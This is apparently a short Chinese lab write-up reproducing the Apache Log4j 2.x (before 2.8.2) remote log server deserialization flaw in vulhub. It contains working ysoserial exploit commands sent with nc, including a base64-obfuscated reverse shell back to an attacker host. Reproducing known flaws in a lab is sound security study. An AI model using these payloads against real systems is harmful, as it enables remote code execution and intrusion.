type
status
date
slug
summary
tags
category
icon
password
Apache Log4j Server
Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器,能够控制日志的输出格式与目的地
影响版本和危害
Apache Log4j 2.8.2之前的2.x版本,攻击者可利用该漏洞执行任意代码。
漏洞复现
1. 写入文件
使用ysoserial生成payload,然后直接发送给 目标机ip:4712 即可。
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "touch /tmp/testsuccess" | nc 192.168.110.132 4712

进入vulhub环境查看

文件生成成功
2.反弹shell
kali(192.168.110.131)机开启监听nc -lvvp 4444
在线网站生成反弹shell:

执行命令后监听成功
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExMC4xMzEvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}" | nc 192.168.110.132 4712
漏洞修复
更新到最新版本
